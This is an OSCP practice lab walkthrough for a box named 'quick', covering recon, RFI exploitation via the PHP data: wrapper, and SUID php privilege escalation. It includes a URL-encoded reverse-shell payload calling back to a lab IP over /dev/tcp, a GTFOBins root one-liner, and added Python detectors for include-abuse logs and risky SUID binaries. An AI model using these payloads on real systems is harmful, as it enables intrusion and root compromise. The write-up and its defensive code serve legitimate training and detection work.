OSCP practice box
Box overview
Box: quick | Difficulty: easy | Topics: vulnerability discovery, RFI (remote file inclusion) exploitation, PHP stream wrapper abuse, SUID php privilege escalation
Information gathering
Host discovery
nmap -sn 192.168.31.0/24
Port scan
└─# nmap -sV -A -p- -T4 192.168.31.97
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-09 11:44 EST
Nmap scan report for 192.168.31.97
Host is up (0.00060s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Quick Automative
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:41:D3:56 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Directory scan
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.31.97 -x php,html,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.97
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,txt,php
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://192.168.31.97/.html (Status: 403) [Size: 278]
http://192.168.31.97/.php (Status: 403) [Size: 278]
http://192.168.31.97/images (Status: 301) [Size: 315] [--> http://192.168.31.97/images/]
http://192.168.31.97/home.php (Status: 200) [Size: 2534]
http://192.168.31.97/contact.php (Status: 200) [Size: 1395]
http://192.168.31.97/about.php (Status: 200) [Size: 1446]
http://192.168.31.97/index.php (Status: 200) [Size: 3735]
http://192.168.31.97/cars.php (Status: 200) [Size: 1502]
http://192.168.31.97/connect.php (Status: 500) [Size: 0]
http://192.168.31.97/.php (Status: 403) [Size: 278]
http://192.168.31.97/.html (Status: 403) [Size: 278]
http://192.168.31.97/send_email.php (Status: 302) [Size: 0] [--> contact.php]
http://192.168.31.97/server-status (Status: 403) [Size: 278]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
Gaining access
A box like this usually has a file inclusion or command execution vulnerability, but fuzzing the parameters turned up nothing responsive. A nikto scan revealed a remote file inclusion (RFI) instead.
http://192.168.31.97/index.php?page=cars
nikto --url http://192.168.31.97
We place a phpinfo file on the Kali box, start a web server, and use the remote file inclusion to execute phpinfo successfully. Note that the application automatically appends a .php suffix to the included path.
Here we use a PHP stream wrapper directly to get a reverse shell.
http://192.168.31.97/index.php?page=data:text/plain,%3C?php%20system(%22id%22);?%3E
http://192.168.31.97/index.php?page=data:text/plain,%3C?php%20system(%22bash+-c+%27bash+-i+%3E%26/dev/tcp/192.168.31.181/4444+0%3E%261%27%22);?%3E
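The include behind index.php?page= builds a file path from user input, and the server permits URL-style includes (the data: wrapper and remote URLs both require PHP's allow_url_include=On), which is why the probes above land. Added example, not part of the original writeup: a small Python script that (a) classifies the page parameter in Apache access-log lines into the include-abuse families seen on this box, and (b) shows the allowlist lookup that should replace the dynamic include. The log lines and the allowlist of page names are constructed for the example, and the signature labels are names chosen here, not from any product.

```python
"""Added example (not from the original writeup): two defender-side checks for
the include($_GET['page'] . '.php') pattern behind the RFI on this box.

1. classify_page_param(): inspects the `page` query parameter in an Apache
   access-log line and reports which include-abuse family it belongs to.
2. resolve_page(): the allowlist-based replacement for the vulnerable include.

All log lines and the allowlist are constructed for this example.
"""
import re
from urllib.parse import unquote

# Constructed Apache combined-log lines: a normal page, the data: wrapper,
# a remote include, a traversal attempt and a php:// wrapper.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Feb/2024:11:50:01 -0500] "GET /index.php?page=cars HTTP/1.1" 200 1502 "-" "Mozilla/5.0"
10.0.0.5 - - [09/Feb/2024:11:51:12 -0500] "GET /index.php?page=data:text/plain,%3C?php%20system(%22id%22);?%3E HTTP/1.1" 200 220 "-" "Mozilla/5.0"
10.0.0.5 - - [09/Feb/2024:11:52:33 -0500] "GET /index.php?page=http://10.0.0.9/phpinfo HTTP/1.1" 200 70000 "-" "curl/8.0"
10.0.0.5 - - [09/Feb/2024:11:53:44 -0500] "GET /index.php?page=../../../../etc/passwd%00 HTTP/1.1" 200 0 "-" "curl/8.0"
10.0.0.5 - - [09/Feb/2024:11:54:55 -0500] "GET /index.php?page=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 5000 "-" "curl/8.0"
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

# (label, predicate over the fully URL-decoded parameter value)
INCLUDE_SIGNATURES = [
    ("data_wrapper", lambda v: v.lower().startswith("data:")),
    ("remote_include", lambda v: re.match(r"^(https?|ftps?)://", v, re.I) is not None),
    ("php_wrapper", lambda v: re.match(r"^php://", v, re.I) is not None),
    ("traversal", lambda v: "../" in v or "..\\" in v or "\x00" in v),
]


def query_params(query):
    """Split a raw query string into {name: [raw values]} without decoding values."""
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, val = pair.partition("=")
            params.setdefault(unquote(key), []).append(val)
    return params


def classify_page_param(log_line, param="page"):
    """Return the signature labels matched by `param` in the request URL.

    An empty list means the parameter is absent or looks like a plain page name.
    The value is decoded twice so single- and double-encoded payloads look alike.
    """
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    query = m.group(1).partition("?")[2]
    labels = []
    for raw in query_params(query).get(param, []):
        value = unquote(unquote(raw))
        for label, pred in INCLUDE_SIGNATURES:
            if pred(value) and label not in labels:
                labels.append(label)
    return labels


def scan_log(text):
    """Map each suspicious line number (1-based) to its signature labels."""
    hits = {}
    for n, line in enumerate(text.splitlines(), start=1):
        labels = classify_page_param(line)
        if labels:
            hits[n] = labels
    return hits


# --- the fix: never derive an include path from user input -------------------
ALLOWED_PAGES = {"home", "about", "cars", "contact"}  # constructed allowlist


def resolve_page(param, allowed=ALLOWED_PAGES, default="home"):
    """Return the file to include for a `page` value, or the default page.

    The result can only be one of the fixed allowlist entries, so no wrapper
    prefix, remote URL or traversal sequence can ever reach include().
    """
    if param in allowed:
        return f"{param}.php"
    return f"{default}.php"


if __name__ == "__main__":
    for n, labels in scan_log(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(labels)}")
    print(resolve_page("cars"), resolve_page("data:text/plain,x"))
```

Feed real access logs to scan_log() to hunt for the same pattern. Setting allow_url_include=Off in php.ini removes the data: and remote-URL families outright, but only the allowlist removes the traversal and php:// families, so both belong in the fix.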
Privilege escalation
find / -type f -perm -u=s 2>/dev/null
https://gtfobins.github.io/gtfobins/php/#sudo
/usr/bin/php7.0 -r "pcntl_exec('/bin/sh',['-p']);"
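The find(1) command above lists every SUID file on the host; what a defender wants from that list is the subset that should not be SUID at all, and an interpreter such as /usr/bin/php7.0 is the clearest case because it runs arbitrary code as the file's owner. Added example, not from the original writeup: a Python audit that classifies find(1) output against an assumed baseline of stock-Ubuntu SUID binaries (adjust to your distribution) and separately flags interpreters and shells. The sample find output is constructed.

```python
"""Added example (not from the original writeup): an audit that flags SUID
binaries which should not carry the bit, the misconfiguration that
`find / -type f -perm -u=s` surfaces on this box.

audit_suid() takes that command's output (a constructed sample here) and sorts
every path into expected / interpreter / unexpected; live_suid_paths()
reproduces the find(1) walk with os.lstat for a real run.
"""
import os
import re
import stat

# Assumed baseline: names that legitimately need SUID on a typical Ubuntu host.
EXPECTED_SUID_NAMES = {
    "sudo", "su", "passwd", "chsh", "chfn", "gpasswd", "newgrp", "mount",
    "umount", "fusermount", "pkexec", "ssh-keysign",
}

# Interpreters and shells: if SUID, they hand the owner's uid to any caller.
# The name must be the bare interpreter or a versioned one (php7.0, python3.8).
INTERPRETER_RE = re.compile(r"^(php|python|perl|ruby|node|lua|bash|dash|zsh|sh)(\d|\.|$)")

# Constructed sample of `find / -type f -perm -u=s 2>/dev/null` output.
SAMPLE_FIND_OUTPUT = """\
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/php7.0
/usr/lib/openssh/ssh-keysign
/usr/local/bin/backup-helper
"""


def classify_suid(path):
    """Return 'expected', 'interpreter' or 'unexpected' for one SUID path."""
    name = os.path.basename(path)
    if name in EXPECTED_SUID_NAMES:
        return "expected"
    if INTERPRETER_RE.match(name):
        return "interpreter"
    return "unexpected"


def audit_suid(find_output):
    """Group the SUID paths in find(1) output by classification."""
    report = {"expected": [], "interpreter": [], "unexpected": []}
    for line in find_output.splitlines():
        path = line.strip()
        if path:
            report[classify_suid(path)].append(path)
    return report


def live_suid_paths(roots=("/usr", "/bin", "/sbin", "/opt")):
    """Walk the given roots and return regular files with the SUID bit set."""
    found = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for f in files:
                p = os.path.join(dirpath, f)
                try:
                    st = os.lstat(p)
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                    found.append(p)
    return found


if __name__ == "__main__":
    for category, paths in audit_suid(SAMPLE_FIND_OUTPUT).items():
        print(f"{category}: {paths}")
```

On a real host, call live_suid_paths() and pass the result joined with newlines to audit_suid(); anything in the interpreter or unexpected buckets is a chmod u-s candidate, and a periodic diff of the expected bucket against a known-good snapshot catches new additions.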
This article was originally published on the WeChat official account 贝雷帽SEC: 【OSCP】quick